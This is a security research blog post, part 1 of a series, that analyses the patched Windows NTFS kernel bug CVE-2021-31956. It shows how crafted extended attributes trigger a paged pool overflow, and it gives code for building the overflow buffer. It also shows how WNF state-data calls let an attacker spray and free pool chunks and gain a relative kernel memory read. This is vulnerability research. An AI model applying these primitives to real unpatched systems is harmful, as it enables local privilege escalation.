NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

15 July 2021 at 12:07

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describes the vulnerability within their advisory document, which notes that many versions of Windows are affected and that the issue has been exploited in the wild in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing modern kernel pool exploits for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how it could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in a series and will describe the vulnerability, the initial constraints from an exploit development perspective, and finally how WNF can be abused to obtain a number of exploit primitives. The posts will also cover the exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.
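The arithmetic above can be sketched in C. This is an illustrative model of the driver's calculation (the names ea_block_size and ea_padding are mine), assuming the unsigned 32-bit types the driver uses:

```c
#include <stdint.h>

/* Size of one Ea block: an 8-byte FILE_FULL_EA_INFORMATION header, the
 * name plus its NUL terminator, then the value (hence the +9). */
static uint32_t ea_block_size(uint32_t name_len, uint32_t value_len)
{
    return 9 + name_len + value_len;
}

/* Bytes required to round the block up to the next 4-byte boundary. */
static uint32_t ea_padding(uint32_t block_size)
{
    return ((block_size + 3) & 0xFFFFFFFC) - block_size;
}
```

For a 5-byte name and a 4-byte value this gives a block size of 18 and a padding of 2, matching the worked example below.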

Putting some example numbers into this, let's assume there are two extended attributes set on the file.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 <= out_buf_length - 0, data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

out_buf_length = 30 - 18 + 0
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where the out_buf_length is 18 and we have the following setup.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

On the first iteration of the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - 18 + 0 
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute with the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 61

The resulting check will be:

ea_block_size <= out_buf_length - padding

61 <= 0 - 2

Since the arithmetic is unsigned, 0 - 2 underflows to a huge value, so the check passes and 61 bytes will be copied off the end of the buffer, corrupting the adjacent memory.
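The broken comparison is easy to reproduce in isolation. The sketch below (my own naming, not the driver's) models the check with the unsigned 32-bit arithmetic the driver uses, so the subtraction wraps rather than going negative:

```c
#include <stdint.h>

/* Model of the flawed bounds check: when padding > out_buf_length the
 * unsigned subtraction wraps to a huge value and any block size passes. */
static int copy_allowed(uint32_t ea_block_size,
                        uint32_t out_buf_length,
                        uint32_t padding)
{
    return ea_block_size <= out_buf_length - padding;
}
```

With out_buf_length at 0 and padding at 2, 0 - 2 wraps to 0xFFFFFFFE, so the copy is allowed regardless of how large the second block is.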

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa, we can see that the NtQueryEaFile system call triggers this code path to reach the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.

In order to trigger the underflow, we need to set our output buffer size to be exactly the length of the first Ea Block.

Provided that padding is required after the first Ea Block, the second Ea Block will then be written out of bounds of the buffer when it is queried.

The interesting aspects of this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is: can this be exploited reliably in the presence of modern kernel pool mitigations, and is this a “good” memory corruption?

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the first 18 bytes of the buffer.

There is then a padding length of 2, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that the NextEntryOffset of the first EA block is set to the offset of the overflowing EA block, including the padding (20). The overflowing EA block's NextEntryOffset is then set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block is the size of the vulnerable buffer we want allocated (minus the pool header). The second extended attribute block holds the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow a copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path that acts on them by setting the output buffer size to be exactly the same size as our first extended attribute using NtQueryEaFile.
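As a rough sketch (and not the exact exploit code), the two-entry buffer handed to NtSetEaFile can be built as below. The structure definition mirrors FILE_FULL_EA_INFORMATION from ntifs.h; the names, sizes, and helper function are my own illustrative choices:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Local mirror of FILE_FULL_EA_INFORMATION from ntifs.h; EaName sits at
 * offset 8, so a block occupies 8 + EaNameLength + 1 + EaValueLength bytes. */
typedef struct _FILE_FULL_EA_INFORMATION {
    uint32_t NextEntryOffset;
    uint8_t  Flags;
    uint8_t  EaNameLength;
    uint16_t EaValueLength;
    char     EaName[1];
} FILE_FULL_EA_INFORMATION;

/* Builds the layout described above: an 18-byte first entry (5-byte name,
 * 4-byte value) padded to offset 20, where the overflowing second entry
 * starts with NextEntryOffset = 0 to terminate the chain.
 * Returns the total number of bytes used, or 0 if buf is too small. */
static size_t build_ea_pair(uint8_t *buf, size_t buf_len,
                            const uint8_t *overflow, uint16_t overflow_len)
{
    if (buf_len < 20u + 14u + overflow_len)
        return 0;

    FILE_FULL_EA_INFORMATION *ea1 = (FILE_FULL_EA_INFORMATION *)buf;
    ea1->NextEntryOffset = 20;              /* 18 rounded to 4-byte alignment */
    ea1->Flags = 0;
    ea1->EaNameLength = 5;
    ea1->EaValueLength = 4;
    memcpy(ea1->EaName, "AAAAA", 6);        /* name plus NUL terminator */
    memset(buf + 8 + 6, 0x41, 4);           /* 4-byte value */
    buf[18] = buf[19] = 0;                  /* alignment padding */

    FILE_FULL_EA_INFORMATION *ea2 = (FILE_FULL_EA_INFORMATION *)(buf + 20);
    ea2->NextEntryOffset = 0;               /* last entry in the chain */
    ea2->Flags = 0;
    ea2->EaNameLength = 5;
    ea2->EaValueLength = overflow_len;
    memcpy(ea2->EaName, "BBBBB", 6);
    memcpy(buf + 20 + 8 + 6, overflow, overflow_len);

    return 20u + 14u + overflow_len;
}
```

The buffer is then written with NtSetEaFile, and NtQueryEaFile is called with Length set to 18 (the first block's size) to trigger the underflow.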

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows; however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes from bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this, which proposes some initial techniques. Had this paper not already been published, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like. The chunk will be serviced by one of the segment heap's four “backends”:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value above of 0x12, which ends up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation being below 0x200.

We can step through the corruption of the adjacent chunk occurring by setting a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'" and then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually real; however, it demonstrates that even tighter attacker constraints can often be worked around, and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means the chunk size calculation will be 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.
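This rounding can be sketched as a one-liner, assuming the 0x10-byte _POOL_HEADER and 0x10-byte chunk granularity shown above (the function name is mine):

```c
#include <stdint.h>

/* Pool chunk size for a request: 0x10-byte _POOL_HEADER plus the data,
 * rounded up to the 0x10-byte segment chunk granularity. */
static uint32_t pool_chunk_size(uint32_t request)
{
    return (request + 0x10 + 0xF) & ~0xFu;
}
```

A Length of 0x12 therefore lands in a 0x30 chunk, and the 94 (0x5E) byte buffer used in the next example lands in a 0x70 chunk.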

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility (WNF) is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading the following documents first to get up to speed:

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool; however, less from a paged pool perspective. As this overflow occurs within the paged pool, we need to find exploit primitives allocated within this pool.

After some reversing of WNF, it was determined that the majority of allocations used within this feature come from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the Length argument is our v6 value, with an additional 16 (0x10) bytes for the _WNF_STATE_DATA header which is prepended.

Therefore, each allocation has a 0x10-byte _POOL_HEADER as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use:

bp nt!ExpWnfWriteStateData "j @r8 = 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with chunks of a controlled size and content. We now continue our investigation of the WNF feature.
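To make the sprayed Wnf chunks land in a chosen LFH bucket, the data length passed to NtUpdateWnfStateData just needs to be sized so that the headers plus data round up to the bucket size. A sketch of that calculation, assuming the 0x10-byte _POOL_HEADER and 0x10-byte _WNF_STATE_DATA described above (the helper name is mine):

```c
#include <stdint.h>

/* Paged pool chunk size consumed by an NtUpdateWnfStateData write of
 * data_len bytes: _POOL_HEADER (0x10) + _WNF_STATE_DATA (0x10) + data,
 * rounded up to 0x10-byte granularity. */
static uint32_t wnf_chunk_size(uint32_t data_len)
{
    return (0x10 + 0x10 + data_len + 0xF) & ~0xFu;
}
```

So spraying with a data length of anywhere from 1 to 0x10 bytes produces the 0x30 chunks seen in the dump above.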

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There is also an API call which does this: NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData, which in turn ends up freeing our allocation.

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists; in my empirical testing I did not seem to be hitting this after a large spray of Wnf chunks.

Relative Memory Read

Now we have the ability to perform both a controlled allocation and free, but what about the data itself, and can we do anything useful with it?

Well, looking back at the structure, you may well have spotted that the AllocatedSize and DataSize are contained within it:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

The DataSize field denotes the size of the actual data following the structure in memory, and is used for bounds checking within the NtQueryWnfStateData function. The actual memory copy operation takes place in the function ExpWnfReadStateData:

So the obvious thing here is that if we can corrupt DataSize then this will give relative kernel memory disclosure.

I say relative because the _WNF_STATE_DATA structure is pointed at by the StateData pointer of the _WNF_NAME_INSTANCE which it is associated with:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
